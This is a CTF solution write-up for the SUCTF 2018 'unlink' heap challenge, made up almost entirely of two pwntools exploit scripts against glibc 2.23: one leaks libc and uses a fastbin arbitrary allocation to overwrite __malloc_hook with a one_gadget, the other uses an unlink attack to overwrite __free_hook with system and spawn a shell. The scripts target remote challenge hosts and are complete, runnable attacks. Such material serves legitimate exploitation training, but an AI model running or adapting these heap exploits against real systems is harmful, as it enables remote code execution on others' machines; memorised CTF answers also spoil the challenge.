练习4

[SUCTF 2018 招新赛]unlink

题目链接 : https://www.nssctf.cn/problem/2334
Ubuntu 16.04

Arbitrary Alloc打法

from pwn import *

# Target endpoint for the hosted instance; swap in the commented-out
# process() line to run against the local binary instead.
HOST, PORT = "node4.anna.nssctf.cn", 28179
io = remote(HOST, PORT)
#io = process("./service")
# Challenge binary and the libc it was shipped with (used only for symbol
# offsets below).
elf = ELF("./service")
libc = ELF("./libc-2.23.so")
context(os='linux', arch='amd64')
#context.log_level='debug'
def debug():
    # Attach gdb to the tube through pwntools.  Intended for the commented-out
    # local process() run; the call site (`#debug()` before io.interactive())
    # is left disabled in this script.
    gdb.attach(io)

def malloc(size):
    """Drive menu option 1 (allocate) and submit *size* as the chunk size."""
    answer = io.sendlineafter
    size_text = str(size).encode()
    answer(b'5. exit\n', b'1')
    answer(b'please input the size : ', size_text)

def free(idx):
    """Drive menu option 2 (delete) for the node at index *idx*."""
    node = str(idx).encode()
    io.sendlineafter(b'5. exit\n', b'2')
    io.sendlineafter(b'which node do you want to delete', node)

def show(idx):
    """Drive menu option 3 (show) for the node at index *idx*.

    The service's reply is left in the tube for the caller to read.
    """
    node = str(idx).encode()
    io.sendlineafter(b'5. exit\n', b'3')
    io.sendlineafter(b'which node do you want to show', node)

def edit(idx, message):
    """Drive menu option 4 (modify): select node *idx* and send *message* raw.

    The content goes out with ``sendafter`` (no trailing newline), so the
    caller controls every byte that is written.
    """
    prompts = (
        (b'5. exit\n', b'4'),
        (b'which one do you want modify :', str(idx).encode()),
    )
    for marker, reply in prompts:
        io.sendlineafter(marker, reply)
    io.sendafter(b'please input the content', message)

# NOTE(review): this sequence depends on the glibc 2.23 allocator bundled with
# the challenge (fastbin reuse with no tcache, and a writable __malloc_hook).
# glibc 2.26+ (tcache) and 2.34+ (malloc hooks removed) break it.

# --- Stage 1: leak a libc address ----------------------------------------
# Four allocations; the trailing comments record the node index the service
# hands out for each (0: 0x10 bytes, 1: 0x80, 2 and 3: 0x60).
malloc(0x10) #0
malloc(0x80) #1
malloc(0x60) #2
malloc(0x60) #3
free(1)
# 0x20 bytes written into the 0x10-byte node 0 overrun into node 1.  The
# leak below relies on show(0) printing past node 0 into the freed node 1;
# how far the service prints is not visible from this script.
payload = b'a' * 0x20
edit(0, payload)
show(0)
# Take the 6 bytes ending at the first 0x7f byte as a little-endian pointer.
# 0x68 is the distance from __malloc_hook to the leaked address in the
# bundled libc-2.23.so; re-derive it if the libc changes.
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x68 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
# Hard-coded offset into the challenge's libc-2.23.so; not valid for any
# other libc build.
one_gadget = 0x4527a + libc_base

# --- Stage 2: redirect a 0x60 allocation onto __malloc_hook --------------
free(3)
# 0x68 bytes of filler presumably fill node 2's usable area; the next two
# qwords overwrite node 3's size field (0x71) and its first qword, which after
# free(3) is the freed chunk's forward pointer.  The target is chosen so that
# a fake 0x70-sized chunk overlaps __malloc_hook — confirm against the libc.
payload = b'a' * 0x68 + p64(0x71) + p64(libc_base + libc.sym["__malloc_hook"] - 0x1b - 0x8)
edit(2, payload)
# Two 0x60 allocations: the first takes node 3's old chunk back, the second
# is served from the forged pointer (indices per the trailing comments).
malloc(0x60) #1
malloc(0x60) #3
# Written through the forged node.  With the target above and a 0x10-byte
# chunk header, one_gadget lands 8 bytes before __malloc_hook and realloc+8
# lands on __malloc_hook itself.
payload = b'a' * 0xb + p64(one_gadget) + p64(libc_base + libc.sym["realloc"] + 8)
edit(3, payload)
# Any further allocation now runs through the overwritten hook.
malloc(0x10)
#debug()
io.interactive()

unlink打法

from pwn import *

# Target endpoint for the hosted instance; swap in the commented-out
# process() line to run against the local binary instead.
HOST, PORT = "node4.anna.nssctf.cn", 28265
io = remote(HOST, PORT)
#io = process("./service")
# Challenge binary and the libc it was shipped with (used only for symbol
# offsets below).
elf = ELF("./service")
libc = ELF("./libc-2.23.so")
context(os='linux', arch='amd64')
#context.log_level='debug'
def debug():
    # Attach gdb to the tube through pwntools.  Intended for the commented-out
    # local process() run; the call site (`#debug()` before io.interactive())
    # is left disabled in this script.
    gdb.attach(io)

def malloc(size):
    """Drive menu option 1 (allocate) and submit *size* as the chunk size."""
    answer = io.sendlineafter
    size_text = str(size).encode()
    answer(b'5. exit\n', b'1')
    answer(b'please input the size : ', size_text)

def free(idx):
    """Drive menu option 2 (delete) for the node at index *idx*."""
    node = str(idx).encode()
    io.sendlineafter(b'5. exit\n', b'2')
    io.sendlineafter(b'which node do you want to delete', node)

def show(idx):
    """Drive menu option 3 (show) for the node at index *idx*.

    The service's reply is left in the tube for the caller to read.
    """
    node = str(idx).encode()
    io.sendlineafter(b'5. exit\n', b'3')
    io.sendlineafter(b'which node do you want to show', node)

def edit(idx, message):
    """Drive menu option 4 (modify): select node *idx* and send *message* raw.

    The content goes out with ``sendafter`` (no trailing newline), so the
    caller controls every byte that is written.
    """
    prompts = (
        (b'5. exit\n', b'4'),
        (b'which one do you want modify :', str(idx).encode()),
    )
    for marker, reply in prompts:
        io.sendlineafter(marker, reply)
    io.sendafter(b'please input the content', message)


# NOTE(review): this sequence depends on the glibc 2.23 allocator bundled with
# the challenge (classic unlink consolidation, writable __free_hook).  The
# fd/bk values below are chosen so glibc's "corrupted double-linked list"
# check passes; glibc 2.34+ has no __free_hook to overwrite.

# Presumably the address of the service's global node table (fixed address,
# so the binary is assumed non-PIE); not derivable from this script.
buf = 0x6020C0
malloc(0x30)
malloc(0x80)
malloc(0x30)
free(1)
# 0x40 bytes into the 0x30-byte node 0 overrun node 1's header so that
# show(0) reads on into the freed node 1 for the leak (how far the service
# prints is not visible here).
payload = b'a' * 0x40
edit(0, payload)
show(0)
# Take the 6 bytes ending at the first 0x7f byte as a little-endian pointer.
# 0x68 is the distance from __malloc_hook to the leaked address in the
# bundled libc-2.23.so; re-derive it if the libc changes.
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x68 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
# The leak write clobbered node 1's size field; 0x38 bytes of filler then
# restore it to 0x91 (0x90 chunk, PREV_INUSE set) before reallocating.
payload = b'a' * 0x38 + p64(0x91)
edit(0, payload)
malloc(0x80)
# Fake chunk laid out inside node 0: prev_size 0, size 0x31, fd/bk pointing
# at buf-0x18 / buf-0x10 so the unlink check resolves both back to the table
# entry at buf; then node 1's prev_size (0x30) and size (0x90, PREV_INUSE
# clear) so that freeing node 1 consolidates backwards into the fake chunk.
payload = p64(0) + p64(0x31) + p64(buf - 0x18) + p64(buf - 0x10) + p64(0) * 2 + p64(0x30) + p64(0x90)
edit(0, payload)
free(1)
# After the unlink the entry at buf presumably points to buf-0x18, so this
# write through node 0 lands on the table itself: three zeroed slots, then
# the entry at buf becomes __free_hook.
payload = p64(0) * 3 + p64(libc.sym["__free_hook"] + libc_base)
edit(0, payload)
# Node 0 now aliases __free_hook; point it at system.
payload = p64(libc_base + libc.sym["system"])
edit(0, payload)
# Freeing a node whose content is "/bin/sh" then goes through the hook.
edit(2, b'/bin/sh\x00')
free(2)
#debug()
io.interactive()